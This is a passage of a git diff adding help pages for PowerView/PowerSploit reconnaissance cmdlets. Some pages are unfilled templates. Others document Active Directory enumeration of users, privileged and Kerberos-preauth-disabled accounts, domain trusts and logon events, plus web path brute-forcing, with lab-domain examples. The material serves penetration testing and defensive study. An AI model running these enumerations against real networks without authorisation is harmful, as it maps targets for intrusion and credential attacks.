
+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+{{Fill LDAPFilter Description}}

+

+```yaml

+Type: String

+Parameter Sets: LDAP

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+{{Fill Properties Description}}

+

+```yaml

+Type: String[]

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+{{Fill ResultPageSize Description}}

+

+```yaml

+Type: Int32

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+{{Fill SearchBase Description}}

+

+```yaml

+Type: String

+Parameter Sets: LDAP

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+{{Fill SearchScope Description}}

+

+```yaml

+Type: String

+Parameter Sets: LDAP

+Aliases: 

+Accepted values: Base, OneLevel, Subtree

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+{{Fill Server Description}}

+

+```yaml

+Type: String

+Parameter Sets: API, LDAP

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+{{Fill ServerTimeLimit Description}}

+

+```yaml

+Type: Int32

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+{{Fill Tombstone Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### System.String

+

+

+## OUTPUTS

+

+### PowerView.DomainTrust.NET

+PowerView.DomainTrust.LDAP

+PowerView.DomainTrust.API

+

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainTrustMapping.md b/docs/Recon/Get-DomainTrustMapping.md
new file mode 100755
index 0000000..692f265
--- /dev/null
+++ b/docs/Recon/Get-DomainTrustMapping.md
@@ -0,0 +1,220 @@
+# Get-DomainTrustMapping

+

+## SYNOPSIS

+{{Fill in the Synopsis}}

+

+## SYNTAX

+

+### NET (Default)

+```

+Get-DomainTrustMapping

+```

+

+### API

+```

+Get-DomainTrustMapping [-API] [-Server <String>]

+```

+

+### LDAP

+```

+Get-DomainTrustMapping [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>]

+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]

+ [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### Example 1

+```

+PS C:\> {{ Add example code here }}

+```

+

+{{ Add example description here }}

+

+## PARAMETERS

+

+### -API

+{{Fill API Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: API

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+{{Fill Credential Description}}

+

+```yaml

+Type: PSCredential

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAP

+{{Fill LDAP Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+{{Fill LDAPFilter Description}}

+

+```yaml

+Type: String

+Parameter Sets: LDAP

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+{{Fill Properties Description}}

+

+```yaml

+Type: String[]

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+{{Fill ResultPageSize Description}}

+

+```yaml

+Type: Int32

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+{{Fill SearchBase Description}}

+

+```yaml

+Type: String

+Parameter Sets: LDAP

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+{{Fill SearchScope Description}}

+

+```yaml

+Type: String

+Parameter Sets: LDAP

+Aliases: 

+Accepted values: Base, OneLevel, Subtree

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+{{Fill Server Description}}

+

+```yaml

+Type: String

+Parameter Sets: API, LDAP

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+{{Fill ServerTimeLimit Description}}

+

+```yaml

+Type: Int32

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+{{Fill Tombstone Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: LDAP

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### None

+

+

+## OUTPUTS

+

+### PowerView.DomainTrust.NET

+PowerView.DomainTrust.LDAP

+PowerView.DomainTrust.API

+

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainUser.md b/docs/Recon/Get-DomainUser.md
new file mode 100755
index 0000000..7247a1d
--- /dev/null
+++ b/docs/Recon/Get-DomainUser.md
@@ -0,0 +1,426 @@
+# Get-DomainUser

+

+## SYNOPSIS

+Return all users or specific user objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty

+

+## SYNTAX

+

+### AllowDelegation (Default)

+```

+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired]

+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]

+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]

+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]

+```

+

+### DisallowDelegation

+```

+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired]

+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]

+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]

+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties samaccountname,usnchanged,...".

+By default, all user objects for

+the current domain are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainUser -Domain testlab.local

+```

+

+Return all users for the testlab.local domain

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"

+```

+

+Return the user with the given SID, as well as Administrator.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff

+```

+

+lastlogoff                                   samaccountname

+----------                                   --------------

+12/31/1600 4:00:00 PM                        dfm.a

+12/31/1600 4:00:00 PM                        dfm

+12/31/1600 4:00:00 PM                        harmj0y

+12/31/1600 4:00:00 PM                        Administrator

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation

+```

+

+Search the specified OU for privileged user (AdminCount = 1) that allow delegation

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon

+```

+

+Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon

+

+### -------------------------- EXAMPLE 6 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainUser -Credential $Cred

+

+### -------------------------- EXAMPLE 7 --------------------------

+```

+Get-Domain | Select-Object -Expand name

+```

+

+testlab.local

+

+Get-DomainUser dev\user1 -Verbose -Properties distinguishedname

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local

+VERBOSE: \[Get-DomainUser\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))

+

+distinguishedname

+-----------------

+CN=user1,CN=Users,DC=dev,DC=testlab,DC=local

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).

+Wildcards accepted.

+Also accepts DOMAIN\user format.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -SPN

+Switch.

+Only return user objects with non-null service principal names.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AdminCount

+Switch.

+Return users with '(adminCount=1)' (meaning are/were privileged).

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AllowDelegation

+Switch.

+Return user accounts that are not marked as 'sensitive and not allowed for delegation'

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: AllowDelegation

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -DisallowDelegation

+Switch.

+Return user accounts that are marked as 'sensitive and not allowed for delegation'

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: DisallowDelegation

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -KerberosPreuthNotRequired

+Switch.

+Return user accounts with "Do not require Kerberos preauthentication" set.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+## OUTPUTS

+

+### PowerView.User

+

+Custom PSObject with translated user property fields.

+

+PowerView.User.Raw

+

+The raw DirectoryServices.SearchResult object, if -Raw is enabled.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainUserEvent.md b/docs/Recon/Get-DomainUserEvent.md
new file mode 100755
index 0000000..c844981
--- /dev/null
+++ b/docs/Recon/Get-DomainUserEvent.md
@@ -0,0 +1,144 @@
+# Get-DomainUserEvent

+

+## SYNOPSIS

+Enumerate account logon events (ID 4624) and Logon with explicit credential

+events (ID 4648) from the specified host (default of the localhost).

+

+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-DomainUserEvent [[-ComputerName] <String[]>] [-StartTime <DateTime>] [-EndTime <DateTime>]

+ [-MaxEvents <Int32>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function uses an XML path filter passed to Get-WinEvent to retrieve

+security events with IDs of 4624 (logon events) or 4648 (explicit credential

+logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).

+A maximum of -MaxEvents (default of 5000) are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainUserEvent

+```

+

+Return logon events on the local machine.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))

+```

+

+Return all logon events from the last 3 days from every domain controller in the current domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000

+

+Return a max of 1000 logon events from the specified machine using the specified alternate credentials.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the computer name to retrieve events from, default of localhost.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: dnshostname, HostName, name

+

+Required: False

+Position: 1

+Default value: $Env:COMPUTERNAME

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -StartTime

+The \[DateTime\] object representing the start of when to collect events.

+Default of \[DateTime\]::Now.AddDays(-1).

+

+```yaml

+Type: DateTime

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [DateTime]::Now.AddDays(-1)

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -EndTime

+The \[DateTime\] object representing the end of when to collect events.

+Default of \[DateTime\]::Now.

+

+```yaml

+Type: DateTime

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [DateTime]::Now

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -MaxEvents

+The maximum number of events to retrieve.

+Default of 5000.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 5000

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target computer.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.LogonEvent

+

+PowerView.ExplicitCredentialLogonEvent

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)

+

diff --git a/docs/Recon/Get-Forest.md b/docs/Recon/Get-Forest.md
new file mode 100755
index 0000000..51ddef6
--- /dev/null
+++ b/docs/Recon/Get-Forest.md
@@ -0,0 +1,80 @@
+# Get-Forest

+

+## SYNOPSIS

+Returns the forest object for the current (or specified) forest.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: ConvertTo-SID

+

+## SYNTAX

+

+```

+Get-Forest [[-Forest] <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current

+forest or the forest specified with -Forest X.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-Forest -Forest external.domain

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-Forest -Credential $Cred

+

+## PARAMETERS

+

+### -Forest

+The forest name to query for, defaults to the current forest.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target forest.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.Management.Automation.PSCustomObject

+

+Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition

+to the forest root domain SID.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-ForestDomain.md b/docs/Recon/Get-ForestDomain.md
new file mode 100755
index 0000000..d755c0c
--- /dev/null
+++ b/docs/Recon/Get-ForestDomain.md
@@ -0,0 +1,82 @@
+# Get-ForestDomain

+

+## SYNOPSIS

+Return all domains for the current (or specified) forest.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-Forest

+

+## SYNTAX

+

+```

+Get-ForestDomain [[-Forest] <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Returns all domains for the current forest or the forest specified

+by -Forest X.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ForestDomain

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-ForestDomain -Forest external.local

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-ForestDomain -Credential $Cred

+

+## PARAMETERS

+

+### -Forest

+Specifies the forest name to query for domains.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target forest.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.DirectoryServices.ActiveDirectory.Domain

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-ForestGlobalCatalog.md b/docs/Recon/Get-ForestGlobalCatalog.md
new file mode 100755
index 0000000..c6da4bd
--- /dev/null
+++ b/docs/Recon/Get-ForestGlobalCatalog.md
@@ -0,0 +1,78 @@
+# Get-ForestGlobalCatalog

+

+## SYNOPSIS

+Return all global catalogs for the current (or specified) forest.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-Forest

+

+## SYNTAX

+

+```

+Get-ForestGlobalCatalog [[-Forest] <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Returns all global catalogs for the current forest or the forest specified

+by -Forest X by using Get-Forest to retrieve the specified forest object

+and the .FindAllGlobalCatalogs() to enumerate the global catalogs.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ForestGlobalCatalog

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-ForestGlobalCatalog -Credential $Cred

+

+## PARAMETERS

+

+### -Forest

+Specifies the forest name to query for global catalogs.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.DirectoryServices.ActiveDirectory.GlobalCatalog

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-ForestTrust.md b/docs/Recon/Get-ForestTrust.md
new file mode 100755
index 0000000..0ff5e3d
--- /dev/null
+++ b/docs/Recon/Get-ForestTrust.md
@@ -0,0 +1,91 @@
+# Get-ForestTrust

+

+## SYNOPSIS

+Return all forest trusts for the current forest or a specified forest.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-Forest

+

+## SYNTAX

+

+```

+Get-ForestTrust [[-Forest] <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will enumerate domain trust relationships for the current (or a remote)

+forest using number of method using the .NET method GetAllTrustRelationships() on a

+System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ForestTrust

+```

+

+Return current forest trusts.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-ForestTrust -Forest "external.local"

+```

+

+Return trusts for the "external.local" forest.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-ForestTrust -Forest "external.local" -Credential $Cred

+

+Return trusts for the "external.local" forest using the specified alternate credenitals.

+

+## PARAMETERS

+

+### -Forest

+Specifies the forest to query for trusts, defaults to the current forest.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.DomainTrust.NET

+

+A TrustRelationshipInformationCollection returned when using .NET methods (default).

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md
new file mode 100755
index 0000000..4311983
--- /dev/null
+++ b/docs/Recon/Get-HttpStatus.md
@@ -0,0 +1,106 @@
+# Get-HttpStatus

+

+## SYNOPSIS

+Returns the HTTP Status Codes and full URL for specified paths.

+

+PowerSploit Function: Get-HttpStatus  

+Author: Chris Campbell (@obscuresec)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Get-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL]

+```

+

+## DESCRIPTION

+A script to check for the existence of a path or file on a webserver.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL

+```

+

+## PARAMETERS

+

+### -Target

+Specifies the remote web host either by IP or hostname.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Path

+Specifies the remost host.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: .\Dictionaries\admin.txt

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Port

+Specifies the port to connect to.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UseSSL

+Use an SSL connection.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error

+

+## RELATED LINKS

+

+[http://obscuresecurity.blogspot.com

+http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]()

+

diff --git a/docs/Recon/Get-NetComputerSiteName.md b/docs/Recon/Get-NetComputerSiteName.md
new file mode 100755
index 0000000..1a3a964
--- /dev/null
+++ b/docs/Recon/Get-NetComputerSiteName.md
@@ -0,0 +1,89 @@
+# Get-NetComputerSiteName

+

+## SYNOPSIS

+Returns the AD site where the local (or a remote) machine resides.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf

+

+## SYNTAX

+

+```

+Get-NetComputerSiteName [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will use the DsGetSiteName Win32API call to look up the

+name of the site where a specified computer resides.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

